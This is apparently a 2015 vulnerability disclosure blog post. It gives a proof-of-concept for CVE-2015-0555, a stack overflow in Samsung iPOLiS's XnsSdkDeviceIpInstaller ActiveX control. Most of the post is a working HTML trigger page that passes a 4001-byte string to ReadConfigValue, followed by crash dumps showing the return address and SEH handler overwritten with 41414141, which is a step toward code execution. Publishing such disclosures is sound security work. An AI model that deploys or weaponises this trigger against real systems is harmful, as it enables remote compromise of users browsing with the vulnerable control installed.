Saturday, February 28, 2015

Samsung iPOLiS 1.12.2 XnsSdkDeviceIpInstaller ActiveX ReadConfigValue Remote Code Execution PoC

Author: Praveen Darshanam
CVE: 2015-0555
Vulnerable File: "C:\Program Files\Samsung\iPOLiS Device Manager\XnsSdkDeviceIpInstaller.ocx"
prototype: "Function ReadConfigValue ( ByVal szKey As String ) As String"
memberName: "ReadConfigValue"
progid/ActiveX: "XNSSDKDEVICELib.XnsSdkDevice"
Operating System: Windows 7 Ultimate N SP1
Vulnerable Software: Samsung iPOLiS 1.12.2

Proof of Concept
<html>
<head>
<title>Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX ReadConfigValue Remote Code Execution PoC</title>
</head>
<body>
<!-- Instantiate the vulnerable control by its CLSID; the script below reaches it through id='target' -->
<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'> </object>
<script>
var argCount = 1;   // ReadConfigValue takes a single BSTR argument (szKey)
var arg1 = "";
var i;

// Build a 4001-byte string of 'A' (0x41). In the crash dumps below these bytes show up
// as 41414141 in the SEH chain, the saved frame pointer and the return address.
for (i = 0; i <= 4000; i++)
{
 arg1 += "A";
}
// The oversized key overruns a stack buffer inside the control and smashes the frame.
target.ReadConfigValue(arg1);
</script>
</body>
</html>
Stack Trace
Two crash dumps follow. The first is the initial access violation inside XnsSdkDeviceIpInstaller.ocx (the byte-scan loop reads from a clobbered argument pointer); at this point the caller's saved frame pointer, the return address and the SEH handler pointer have already been overwritten with 41414141. The second is taken inside ntdll after the exception dispatcher has called that overwritten handler at 41414141, which faults in turn (EBX and ECX also hold 41414141).
Exception Code: ACCESS_VIOLATION
Disasm: 6492CE MOV AL,[EDI+EDX]

Seh Chain:
--------------------------------------------------
1 41414141

Called From                   Returns To
--------------------------------------------------
XNSSDKDEVICE.6492CE           41414141
41414141                      8ABAB41
8ABAB41                       mfc100.64BA90C1
mfc100.64BA90C1               3D39D016
FFFFFFFE                      mfc100.64AFBE5C

Registers:
--------------------------------------------------
EIP 006492CE
EAX 00000408
EBX 01AD9FB0 -> 0065A564
ECX 00000414
EDX 08ABAB41
EDI 0000009C
ESI 0000009C
EBP 002DEA9C -> Asc: AAAAAAAAA
ESP 002DE7F4 -> 59D56B19 -> Asc: k k

Block Disassembly:
--------------------------------------------------
6492BD MOV ECX,EAX
6492BF XOR ESI,ESI
6492C1 MOV [EBP-298],ECX
6492C7 TEST ECX,ECX
6492C9 JLE SHORT 00649340
6492CB MOV EDX,[EBP+8]
6492CE MOV AL,[EDI+EDX]  <--- CRASH
6492D1 CMP AL,2F
6492D3 JNZ SHORT 00649333
6492D5 TEST EDI,EDI
6492D7 JNZ SHORT 00649304
6492D9 PUSH 80
6492DE LEA EAX,[EBP-90]
6492E4 PUSH EDI
6492E5 PUSH EAX

ArgDump:
--------------------------------------------------
EBP+8 08ABAB41
EBP+12 64BA90C1 -> EBE84589
EBP+16 3D39D016
EBP+20 FFFFFFFE
EBP+24 64AFBE5C -> CCCCCCC3
EBP+28 00000018

Stack Dump:
--------------------------------------------------
2DE7F4 19 6B D5 59 08 00 00 00 A0 EA 2D 00 10 92 64 00  [.k.Y..........d.]
2DE804 14 04 00 00 64 65 C4 64 00 00 00 00 00 00 00 00  [....de.d........]
2DE814 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  [................]
2DE824 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  [................]
2DE834 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  [................]

Exception Code: ACCESS_VIOLATION
Disasm: 41414141 ?????

Seh Chain:
--------------------------------------------------
1 41414141

Called From                   Returns To
--------------------------------------------------
ntdll.77B670B4                ntdll.77BDAB1A
ntdll.77BDAB1A                ntdll.77BB0404
ntdll.77BB0404                ntdll.77B3F956
ntdll.77B3F956                ntdll.77B67017
ntdll.77B67017                41414141
41414141                      8ABAB41
8ABAB41                       mfc100.64BA90C1
mfc100.64BA90C1               3D39D016
FFFFFFFE                      mfc100.64AFBE5C

Registers:
--------------------------------------------------
EIP 77B670B4 -> C0000005
EAX 002DE0EC -> C0000005
EBX 41414141
ECX 41414141
EDX 00000000
EDI 00000000
ESI 002DE0EC -> C0000005
EBP 002DE0D8 -> 002DE40C
ESP 002DE088 -> 77B662A4


Block Disassembly:
--------------------------------------------------
77B6709C MOV [ESP+8],EBX
77B670A0 JMP 77B837AD
77B670A5 LEA ESP,[ESP]
77B670AC LEA ESP,[ESP]
77B670B0 MOV EDX,ESP
77B670B2 SYSENTER
77B670B4 RETN  <--- CRASH
77B670B5 LEA ESP,[ESP]
77B670BC LEA ESP,[ESP]
77B670C0 LEA EDX,[ESP+8]
77B670C4 INT 2E
77B670C6 RETN
77B670C7 NOP
77B670C8 PUSH EBP
77B670C9 MOV EBP,ESP


ArgDump:
--------------------------------------------------
EBP+8 002DE0EC -> C0000005
EBP+12 002DE13C -> 00000000
EBP+16 00000000
EBP+20 C0000005
EBP+24 00000001
EBP+28 00000000

P.S. CERT tried to coordinate but there wasn't any response from Samsung